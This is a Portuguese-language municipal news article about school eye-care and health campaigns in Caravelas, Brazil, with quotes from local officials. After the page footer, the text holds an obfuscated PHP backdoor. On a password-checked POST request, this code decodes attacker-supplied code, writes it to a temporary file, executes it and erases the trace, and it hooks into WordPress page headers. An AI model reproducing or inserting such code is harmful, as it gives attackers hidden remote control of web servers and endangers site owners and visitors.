• SEJA BEM-VINDO

Caravelas segue cuidando dos olhos e da saúde dos alunos da rede municipal de ensino

Publicado em: 19/07/2022 Atualizado:: julho 19, 2022

Preparação para atendimento oftalmológico de alunos matriculados na rede pública de ensino do município de Caravelas

 

 

3.200 atendimentos já haviam sido realizados em Barcelona, Ferraznópolis, Rancho Alegre e Juerana. Esse número subiu para 3.624 com os atendimentos realizados em Nova Tribuna, na última quinta-feira (14), com a realização de 100 consultas oftalmológicas, 50 pediátricas, 50 de clínica geral, 50 com a nutricionista, 50 com a psicóloga, 50 odontológicas, além da emissão de 49 identidades e 25 de CPF.

 

Essa foi mais uma ação, com resultados obtidos através do Projeto Nosso Povo, Nossa Riqueza, cuja proposta é superar a marca dos 4.000 atendimentos, atenuando os impactos da pandemia e melhorando a qualidade de vida dos mais de 4.500 alunos matriculados em escolas do município de Caravelas.

 

A iniciativa reúne atendimentos oftalmológicos com várias especialidades em saúde (médicos pediatra e clínico geral, dentistas, psicológo, nutricionista e enfermeiros), além de testes rápidos, serviços em programa sociais (mantidos através do CadÚnico e do BPC – Benefício de Prestação Continuada) e a emissão de documentos, inclusive, com a gratuidade de fotografia.

 

 

Alunos foram atendidos na escola Sebastião Pereira dos Santos, em Nova Tribuna

 

 

De acordo com a Secretária de Educação, Jocivânia Caetano, “o projeto surgiu a partir da percepção dos problemas enfrentados pelos alunos, com o baixo rendimento escolar, devido à problemas na visão e à necessidade de cuidados especiais com a saúde física e mental”, explicou.

 

Para a Secretária de Saúde, Marina Ramalho, “o projeto é uma resposta rápida e eficiente para cuidar dessas crianças que, nos últimos dois anos, se viram afastadas das salas de aula pela pandemia, diminuindo a interação social e intensificando a exposição dos olhos às telas de celulares, televisão, tablets e computadores”, argumentou.

 

Secretária de Saúde de Caravelas, Marina Ramalho

 

 

O médico oftalmologista, Dr. Fábio Borges, destacou o pioneirismo do municipio de Caravelas com a saúde dos alunos da rede pública. “Em quase 30 anos de medicina, poucas vezes vi um cuidado tão grande com as pessoas e um trabalho desses, visando a prevenção de doenças para garantir maior qualidade de vida, principalmente, de quem mais precisa”, parabenizou.

 

Dr. Fábio Borges (médico oftalmologista)

 

 

Já o Prefeito de Caravelas, Silvio Ramalho, comemorou os números e os resultados obtidos com um grande investimento para melhorar a vida da população. “Há quase seis anos estamos investindo para revitalizar a estrutura da saúde pública, com melhoria das unidades de saúde, modernização do hospital, aquisição de ambulâncias, funcionamento do ambulatório, do laboratório de análises clínicas e a contratação de profissionais especialistas, afim de garantir uma grande oferta de especialidades de saúde, com toda a infraestrutura necessária para quem precisa ser atendido através do Sistema Único de Saúde (SUS)”, disse.

 

Silvio Ramalho (Prefeito de Caravelas)

 

 

DIFERENÇA NOS MUTIRÕES – Os atendimentos oftalmológicos do Projeto Nosso Povo, Nossa Riqueza visam o diagnóstico e a prevenção de doenças, oferecendo consultas com especialistas voltados à pediatria e procedimentos, próprios da faixa etária dos alunos matriculados na rede pública municipal de ensino. Já os mutirões oftalmológicos visam o diagnóstico e o tratamento de doença em pessoas com histórico pessoal ou familiar de hipertensão diabetes ou acima dos 40 anos de idade.

 

 

 

 

 

 

 

……………………………..

 

Fonte: Ascom/PMC

 

 

 


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}